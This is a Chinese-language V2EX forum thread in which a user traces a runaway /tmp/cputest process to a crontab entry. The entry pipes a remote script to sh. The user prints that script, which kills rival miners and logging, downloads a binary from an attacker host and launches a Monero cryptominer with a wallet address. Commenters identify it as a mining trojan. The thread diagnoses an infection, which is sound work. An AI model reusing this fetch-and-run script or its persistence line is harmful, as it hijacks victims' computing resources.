V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
Symo
V2EX  ›  Linux

求助: 一直有个/tmp/cputest 的进程占满了 CPU, 每次删掉之后它又自动出现, 如何判断这个文件是怎么来的?

  •  
  •   Symo · 2017-04-06 10:20:03 +08:00 · 5867 次点击
    这是一个创建于 2813 天前的主题,其中的信息可能已经有所发展或是发生改变。

    screen

    8 条回复    2017-04-06 13:16:25 +08:00
    Symo
        1
    Symo  
    OP
       2017-04-06 10:25:47 +08:00
    问题找到了, crontab 里面有这么一行
    `curl http://194.87.239.7/common/logo.jpg|sh`
    文件下载下来是这样的
    ```
    #!/bin/sh
    rm -rf /tmp/index_bak.*
    rm -rf /tmp/httpd.conf.*
    rm -rf /tmp/httpd.conf
    pkill -f 49hNrEaSKAx5FD8PE49Wa3DqCRp2ELYg8dSuqsiyLdzSehFfyvk4gDfSjTrPtGapqcfPVvMtAirgDJYMvbRJipaeTbzPQu4
    pkill -f 4AniF816tMCNedhQ4J3ccJayyL5ZvgnqQ4X9bK7qv4ZG3QmUfB9tkHk7HyEhh5HW6hCMSw5vtMkj6jSYcuhQTAR1Sbo15gB
    pkill -f 4813za7ePRV5TBce3NrSrugPPJTMFJmEMR9qiWn2Sx49JiZE14AmgRDXtvM1VFhqwG99Kcs9TfgzejAzT9Spm5ga5dkh8df
    pkill -f cpuloadtest
    pkill -f crypto-pool
    pkill -f xmr
    pkill -f prohash
    pkill -f monero
    pkill -f miner
    pkill -f nanopool
    pkill -f minergate
    pkill rsyslog
    pkill syslog
    pkill -f "/tmp/apache"
    pkill -f "/tmp/httpd.conf"
    ps auxf|grep -v grep|grep "/tmp/apache"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/httpd.conf"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "crypto-pool"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "prohash"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monero"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "miner"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "nanopool"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "minergate"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "[email protected]"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "49JsSwt7MsH5m8DPRHXFSEit9ZTWZCbWwS7QSMUTcVuCgwAU24gni1ydnHdrT9QMibLtZ3spC7PjmEyUSypnmtAG7pyys7F"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "479MD1Emw69idbVNKPtigbej7x1ZwFR1G3boyXUFfAB89uk2AztaMdWVd6NzCTfZVpDReKEAsVVBwYpTG8fsRK3X17jcDKm"|awk '{print $2}'|xargs kill -9
    ps -fe|grep 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R |grep -v grep
    if [ $? -ne 0 ]
    then
    echo "start process....."
    cat /proc/cpuinfo|grep aes>/dev/null
    if [ $? -ne 1 ]
    then
    curl -o /tmp/cputest http://194.87.239.7/common/cputest.jpg
    wget -O /tmp/cputest http://194.87.239.7/common/cputest.jpg
    else
    curl -o /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
    wget -O /tmp/cputest http://194.87.239.7/common/cputest_na.jpg
    fi
    chmod +x /tmp/cputest
    nohup /tmp/cputest -B -a cryptonight -o stratum+tcp://212.129.44.156:80 -u 43We5FWNCmqffXY5tHriA3LMqhCRgXP9uZvMAZ8gfG7SYaLdQTpo2GGPDjk6zWdGAe6RedPTRhmC1EkGnAY3dPE62H3Gu8R -p x >/dev/null
    else
    echo "runing....."
    fi
    ```

    这个脚本是有什么用意么?
    ryd994
        2
    ryd994  
       2017-04-06 10:30:09 +08:00 via Android
    哈哈哈哈真黑,先把别人的挖矿软件干掉
    再开自己的
    xss
        3
    xss  
       2017-04-06 10:31:18 +08:00
    挖矿木马....
    holyzhou
        4
    holyzhou  
       2017-04-06 10:51:00 +08:00
    我能说 这脚本写的真是丑嘛。
    mingl0280
        5
    mingl0280  
       2017-04-06 12:27:45 +08:00
    挖矿马 233333
    expy
        6
    expy  
       2017-04-06 12:44:26 +08:00
    同行是大敌,名字叫 cputest 也是机智 233
    AlisaDestiny
        7
    AlisaDestiny  
       2017-04-06 13:13:43 +08:00
    真是长见识了。好奇的是这个 cron task 是如何写进去的。
    kmahyyg
        8
    kmahyyg  
       2017-04-06 13:16:25 +08:00 via Android
    3f 正解
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1023 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 20:37 · PVG 04:37 · LAX 12:37 · JFK 15:37
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.